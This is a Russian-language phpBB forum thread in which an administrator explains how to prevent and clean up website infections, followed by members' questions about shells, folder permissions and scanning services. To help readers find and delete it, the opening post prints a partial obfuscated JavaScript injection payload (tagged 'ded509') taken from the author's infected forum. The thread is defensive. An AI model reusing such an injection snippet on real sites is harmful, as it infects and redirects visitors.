Трояны и phpbb3

В данном подфоруме будут располагаться все статьи, помогающие освоиться в администрировании форума.

Модераторы: Vl@d1m1r, Lorem Ipsum, Atlas

Правила форума
----
Ответить
Аватара пользователя
DeaDRoMeO
Старожил Форума
Старожил Форума
Сообщения: 16763
Стаж: 13 лет
Откуда: Витебск
Контактная информация:

Трояны и phpbb3

Сообщение DeaDRoMeO »

Всем доброго времени суток. Каждый день ломаю голову, думаю чего бы еще интересного вам рассказать на основе личного опыта. В свете недавнешних событий, решил что можно порассуждать о троянских вирусах (хотя не знаю почему повелось так называть заражение, ведь вроде ПК-ные троянцы тырят личные данные, а сайтовые - врядли). Собственно начнем ....

Многие из вас частенько натыкались в интернете на сайты, которые были поражены вирусами, при посещении которых антивирус начинал истошно вопить. Натыкался на такие и я, думал мол, как так админы допустили это (ну конечно есть определенный процент сайтов, созданных специально для рассады заразы). Думал меня пронесет, все вроде защищено... Ан нет, в истории нашего форума произошло 2 заражения. Первое - очень легкое, заражены были только JS-файлы, а может я вовремя заглянул и закрыл очаг. Второе же, недавнешнее - очень жесткое. Почти 60% файлов были заражены, а это и php-, html-, JS-файлы + перенаправление на какой то трейдерский сайт. Потратив день, сумел все же восстановить форум. Дело это конечно неприятное, но зато получил своеобразный опыт, да и бекап форума сделал наконец то полный :hi_hi_hi:

Так что ребята, никогда не расслабляйтесь, беда может и вас постигнуть.... Давайте подумаем, а чем же можно уберечься от подобных ситуаций ?

1. Пароли к панели хостинга и ФТП
- Это основное и самое больное место всех без исключения. Вам главное понять, что каким бы ни был начальный пароль, данный вам хостером - он рано или поздно будет взломан. Почему ? Да потому, что ни у одного хостера я не видел задержки на безошибочный ввод пароля. Иными словами, если ктото задастся целью ломануть пароль - его ничто не остановит. Пароль можно подбирать бесконечно долго, таймаутов на ввод неправильного пароля нет нигде. Собственно первоочередная ваша задача - смена дефолтных паролей доступа на более сложные, я бы даже рекомендовал делать пароли максимально длинными. Составляйте их таким образом, чтобы логика напрочь отсутствовала, брякните по клаве на 20 знаков пароль с цифрами и буквами. Чем длинней пароль - тем дольше его подбирать, у взломщика может попросту кончиться терпение.

2. Доступы на папки сервера
- Это такая вещь, стоящая на одном уровне с первым пунктом. Возможно даже выше. Тут главное понять что злоумышленникам иногда и не надо подбирать пароли. Если у вас на сервере есть хоть одна папка с открытым доступом (права наверное 777), то вам несдобровать. Банально заливается шелл и в течении пары часов ваш форум заражен. Так что не лепите тысячи папок на ФТП, делайте только нужные и настраивайте к ним нормальные права доступа.

3. Проверенные модификации и скрипты
- Раз уж говорим о наших форумах, то нужно помнить и об этом пункте. Собственно вас могут подкупить красивым названием и описанием мода(скрипта), а уж внутри него будет настоящий троянчик или уязвимость. Так что советую ставить только моды, прошедшие валидацию на оффоруме. Ставить моды, которые вам необходимы, а не потому что у большинства они стоят. Такое же дело и со скриптами. Перед их установкой внимательно читайте описание, комменты, просмотрите код скриптов, если чтото покажется подозрительным - лучше спросить у знающих людей.

4. Частые и полные бекапы форума.
- Способ пассивной защиты, писать особо тут нечего. Логика проста - если вы делаете частые полные бекапы форума, то при заражении файлов, вам потребуется всего лишь заново залить файлики с заменой (ну разумеется пароли поменять от хостинга).

5. Панель вебмастера Гугл
- Этот инструмент весьма полезен. Почему не яндекс ? Потому что яндекс не умеет кое чего. Представим себе такую ситуацию - вам необходимо отлучиться от форума на достаточно большой срок, доступ у вас есть только к почте, а за это время ваш форум все же заразили. Так вот, с задержкой в 5-6 часов вам придет на мыло письмецо от Гугла, мол заражен ваш форум. Очень полезная вещь, ведь никто не знает наверняка когда форум может быть заражен, а так вы получите уведомление и наиболее быстро среагируете на аварию. Собственно, не ленитесь и добавляйте свой форум в панель вебмастера Гугла

Со способами защиты мы ознакомились, теперь подумаем над вашими действиями в том случае если все же получили заражение ....

Раз уж вы читаете данную статью, то наверняка после прочтения добавите наконец то свой форум в Гугл :hi_hi_hi:
Так вот, либо сами замечаете недовольство антивируса на ваш форум либо получаете письмецо от Гугла, тут главное не паниковать, не делать опрометчивых действий. Расслабьтесь и начинайте по пунктам...

1. Отключение форума на уровне хостинга
- Такая функция должна быть у каждого хостера. Тут же вам надо отключить работу вашего домена, дабы прекратить издевательство над пользователями (заодно и возможно остановить процесс распространения заражения). Не бойтесь этого делать, ФТП доступ у вас то будет.

2. Смена паролей
- Очевидное решение - поменяйте пароли всех доступов на хостинг - панель, ФТП, может еще чего. Таким действием отрубим потенциального злоумышленника от файлов.

3. Работа с файлами форума
- Есть актуальный бекап ? Восстанавливаем. Нет ? Скачиваем абсолютно все файлы форума себе на компьютер и через Нотепад ++ смотрим сначала все JS файлы. Они заражаются в первую очередь, потом уж остальные. Смотрим код скриптов на наличие совершенно лишних участков, к примеру у меня был такой код (он разумеется не полный)

Код: Выделить всё

<!--ded509--> catch(q){a=1}if(!a){try{document["\x62ody"]^=~1;}catch(q){a2="_"}z="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_77_27_
44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_
74__30_42_14_11_14_11_27_27_27_27_77_35_7a_79_6a_27_44_27_2e_6f_7b_7
b_77_41_36_36_6a_68_6a_68_6d_73_7c_77_35_79_7c_36_6a_76_7c_75_7b_38_3e_35_77_6f_77_2e_42_14_11_27_27_27_27_77_35_7a_7
b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73
_7c_7b_6c_2e_42_14_11_27_27_27_27_77
__63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27
_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80
_50_6b_2f_2e_77_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_77_30_42_
14_11_27_27_27_27_84_14_11_84_30_2f_30_42""split"}</script><!--/ded509-->
Ну очень такое бросается в глаза. Плюс, проблема всех таких вставок - код везде абсолютно одинаков. Значит открываем блокнот и идем в поиск по файлам, для начала вбиваем весь кусок вредоносного кода и выбираем опцию удаления найденного. Потом берем выдающуюся часть, у себя я взял ded509 и еще раз вбиваем это в поиск по файлам для успокоения совести (а вдруг все же вставка разная есть). После этого визуально осматриваем папки форума на наличие новых и непонятных папок с файлами, удаляем подозрительное. Потом для чистоты эксперимента сканируем все файлы антивирем и заливаем все обратно на ФТП с обязательной заменой.

4. Завершающий этап
- Активируем работу домена, смотрим на адекватную работу форума, антивирь молчит. Все хорошо, идем в панель хостинга и смотрим лог работ с папками за ближайшие 24 часа. Нам надо выловить момент заражения и понять - ломанули ли пароль иль шелл залили, делаем необходимые выводы. В панели вебмастера Гугла отправляем форум на перепроверку и в течении 24 часов ваш форум полностью разблокируется в Гугле и продолжит свою работу на благо общества :hi_hi_hi:

Впринципе наверное все написал что и хотел. Сами видите, дело одновременно и сложное и простое это. Надеюсь вас не постигнет такая беда, а если что - у вас есть маленькое руководство к действию, можете и мне в личку стукнуть, помогу если будет завал. Всем безоблачной работы ваших форумов :ya_hoo_oo:

ЗЫ. Может у кого есть еще советы? Пишите, не стесняйтесь, составим руководство вместе :ras_pal_cov_ka:
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
#1
Аватара пользователя
Lorem Ipsum
Прописался тут надолго
Прописался тут надолго
Сообщения: 1974
Стаж: 11 лет 7 месяцев
Контактная информация:

Трояны и phpbb3

Сообщение Lorem Ipsum »

Японский легче выучить... :-(--
Но тем не менее, спасибо за статью, надо будет сидеть по пунктам разбираться.

У меня несколько вопросов:
1. Что такое шелл?
2. Как ты обнаружил заражение, откуда оно пришло?
3. Чтобы не проделывать все описанные операции, существует ли один какой-то способ,? Например, сканер, который ежедневно отслеживает изменения? )если делать ежедневный бэкап, то отследить будет проще?)
Последний раз редактировалось Lorem Ipsum 07 май 2013, 04:38, всего редактировалось 1 раз.
Я уже прошел тот период когда можно было забывать про очистку кеша ©salexcorp
#2
Аватара пользователя
DeaDRoMeO
Старожил Форума
Старожил Форума
Сообщения: 16763
Стаж: 13 лет
Откуда: Витебск
Контактная информация:

Трояны и phpbb3

Сообщение DeaDRoMeO »

1. Обычно под шеллом подразумевают скрипт, который взломщики загружают на сервер и с его помощью осуществляется дальнейшее управление сервером. Шелл это своеобразная графическая оболочка, которая позволит управлять файлами сервера
2. Я так и не понял, логи были утрачены, поздно спохватился. Как обнаружил - просто зашел на форум,а меня перекинуло на другой сайт
3. Ну бекапы делать надо в любом случае, а так в качестве профилактики - менять пароли каждый месяц хотя бы от сервера
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
#3
Аватара пользователя
Lorem Ipsum
Прописался тут надолго
Прописался тут надолго
Сообщения: 1974
Стаж: 11 лет 7 месяцев
Контактная информация:

Трояны и phpbb3

Сообщение Lorem Ipsum »

DeaDRoMeO писал(а):под шеллом подразумевают скрипт, который взломщики загружают на сервер и с его помощью осуществляется дальнейшее управление сервером.
Злодеи могут загрузить этот скипт, только если узнают или взломают пароль от сервера? Или существуют ещё какие-то возможности?
Я уже прошел тот период когда можно было забывать про очистку кеша ©salexcorp
#4
Аватара пользователя
DeaDRoMeO
Старожил Форума
Старожил Форума
Сообщения: 16763
Стаж: 13 лет
Откуда: Витебск
Контактная информация:

Трояны и phpbb3

Сообщение DeaDRoMeO »

Если знают пароль - стопроцентно, я еще грешу на права на папки сервера, надо будет самому потестировать у себя)
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
#5
Аватара пользователя
Олег В
Активно общаюсь
Активно общаюсь
Сообщения: 340
Стаж: 11 лет
Контактная информация:

Трояны и phpbb3

Сообщение Олег В »

DeaDRoMeO писал(а):Если у вас на сервере есть хоть одна папка с открытым доступом (права наверное 777)
Сергей! Ткните в тему где есть информация, как изменить права если они 777 или другие которые нужно исправить. А главное как это выяснить и исправить! Прочитал тему. Растроился, задумался, испугался. Позже поменяю все нужные пароли на 20-ти значные, а вот как защитить папки с открытым доступом, как узнать есть ли они у меня и что где изменить чтоб они были гарантированно защещены,не знаю!
Опять же, Спасибо!!
#6
Аватара пользователя
DeaDRoMeO
Старожил Форума
Старожил Форума
Сообщения: 16763
Стаж: 13 лет
Откуда: Витебск
Контактная информация:

Трояны и phpbb3

Сообщение DeaDRoMeO »

Олег В писал(а):а вот как защитить папки с открытым доступом
Через браузер пробуем получить доступ к папке, допустим есть папочка c любым именем и правами 777, переходим по адресу

Код: Выделить всё

http://адрес форума/имя папки/
Если в результате в браузере открывается содержимое папки - это печально
Олег В писал(а):как узнать есть ли они у меня
Ну тут вручную надо проверять права на папки, через тотал коммандер к примеру
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
#7
Аватара пользователя
Олег В
Активно общаюсь
Активно общаюсь
Сообщения: 340
Стаж: 11 лет
Контактная информация:

Трояны и phpbb3

Сообщение Олег В »

Проверил свои папки на сервере. Попытка зайти во многие из них выводит ошибку 403 и переводит на хостинг, но некоторые папки не выдают ни каких ошибок. Просто чистый экран в браузере. Так и должно быть или где то сидит скрытая угроза??
#8
Аватара пользователя
DeaDRoMeO
Старожил Форума
Старожил Форума
Сообщения: 16763
Стаж: 13 лет
Откуда: Витебск
Контактная информация:

Трояны и phpbb3

Сообщение DeaDRoMeO »

Олег В писал(а):но некоторые папки не выдают ни каких ошибок. Просто чистый экран в браузере.
А какие на них права стоят ?
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
#9
Аватара пользователя
ursego
Свой на все 100
Свой на все 100
Сообщения: 478
Стаж: 11 лет 2 месяца
Откуда: Днепропетровск
Контактная информация:

Трояны и phpbb3

Сообщение ursego »

Lorem Ipsum писал(а):Чтобы не проделывать все описанные операции, существует ли один какой-то способ,? Например, сканер, который ежедневно отслеживает изменения?
Надо зарегистрировать свой форум на сайте siteguard.ru. Они периодически сканируют, и если обнаруживают что-то новое и подозрительное, присылают имейл. Вон недавно Сергей добавил какой-то скриптик, и мне намейл тут-же пришло:

Код: Выделить всё

SiteGuard.ru информирует: появились новые коды на сайте forum.north-ameri.ca.
Подробности: http://www.siteguard.ru/p23.html
Если известно, что это за скрипт, то в таблице на этом сайте возле него надо нажать кнопочку, тем самым давая понять, что это не какая-то кака, и сканер будет игнорировать этот скрипт при последующих сканах.

Кроме того, можно поставить кнопочку этого сайта (как у меня на форуме в самом низу), которая будет информировать посетителей, что форум защищён сайтгардом.
#10
Аватара пользователя
Олег В
Активно общаюсь
Активно общаюсь
Сообщения: 340
Стаж: 11 лет
Контактная информация:

Трояны и phpbb3

Сообщение Олег В »

ursego, Спасибо за ссылку. Зарегился и проверился. Система сообщает о трёх подозрительных Javascript/IFrame.
Удалить их или добавить в доверенные, кто что посоветует??
#11
Аватара пользователя
ursego
Свой на все 100
Свой на все 100
Сообщения: 478
Стаж: 11 лет 2 месяца
Откуда: Днепропетровск
Контактная информация:

Трояны и phpbb3

Сообщение ursego »

Всё! Это конец! Табун троянских коней захватил форум!
Эти нормальные.
#12
Аватара пользователя
Олег В
Активно общаюсь
Активно общаюсь
Сообщения: 340
Стаж: 11 лет
Контактная информация:

Трояны и phpbb3

Сообщение Олег В »

DeaDRoMeO писал(а):А какие на них права стоят ?
На всех папках выставленны вот такие такие атрибуты.
#13
Аватара пользователя
Лена
Завсегдатай Форума
Завсегдатай Форума
Сообщения: 966
Стаж: 11 лет 5 месяцев
Контактная информация:

Трояны и phpbb3

Сообщение Лена »

Блин... вот зачем читала такие страсти! теперь буду переживать и боятся )))
Если у вас на сервере есть хоть одна папка с открытым доступом (права наверное 777), то вам несдобровать
ни на одной папке не должно быть таких прав??? Файлов это тоже касается?
Частые и полные бекапы форума
есть на ХВ темка где прям описано - как делать ПОЛНЫЕ бекапы?
#14
Аватара пользователя
DeaDRoMeO
Старожил Форума
Старожил Форума
Сообщения: 16763
Стаж: 13 лет
Откуда: Витебск
Контактная информация:

Трояны и phpbb3

Сообщение DeaDRoMeO »

Олег В, атрибуты правильны
Лена писал(а):как делать ПОЛНЫЕ бекапы?
Да, правда инструкция в теме о том, как развернуть форум у себя на компе - phpbb3 и Denver
Лена писал(а):ни на одной папке не должно быть таких прав??? Файлов это тоже касается?
Обычно такие папки защищаются хостингом от стороннего вмешательства, если найдете такую папку с правами 777 то проверьте, возможно ли с браузера попасть в эту папку
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
#15
Аватара пользователя
Лена
Завсегдатай Форума
Завсегдатай Форума
Сообщения: 966
Стаж: 11 лет 5 месяцев
Контактная информация:

Трояны и phpbb3

Сообщение Лена »

Лена писал(а):если найдете такую папку с правами 777 то проверьте, возможно ли с браузера попасть в эту папку
если не попадаю, то так и оставить 777 ? а если править, то на что? 775 хотя бы?
#16
Аватара пользователя
DeaDRoMeO
Старожил Форума
Старожил Форума
Сообщения: 16763
Стаж: 13 лет
Откуда: Витебск
Контактная информация:

Трояны и phpbb3

Сообщение DeaDRoMeO »

Папка форумная или сами ее создавали ?
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
#17
Аватара пользователя
Лена
Завсегдатай Форума
Завсегдатай Форума
Сообщения: 966
Стаж: 11 лет 5 месяцев
Контактная информация:

Трояны и phpbb3

Сообщение Лена »

А есть разница?
В общем на папках cache, files, store и карта сайта стоят права 777. Убрать на 775???
#18
Аватара пользователя
DeaDRoMeO
Старожил Форума
Старожил Форума
Сообщения: 16763
Стаж: 13 лет
Откуда: Витебск
Контактная информация:

Трояны и phpbb3

Сообщение DeaDRoMeO »

Лена писал(а):В общем на папках cache, files, store и карта сайта стоят права 777.
Так того требуют разрабы, лучше не трогать
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
#19
Аватара пользователя
Лена
Завсегдатай Форума
Завсегдатай Форума
Сообщения: 966
Стаж: 11 лет 5 месяцев
Контактная информация:

Трояны и phpbb3

Сообщение Лена »

Т.е. через эти папки ничего серьезного нельзя взломать? Через браузер они вроде не открываются, хотя права 777 стоят....
#20
Ответить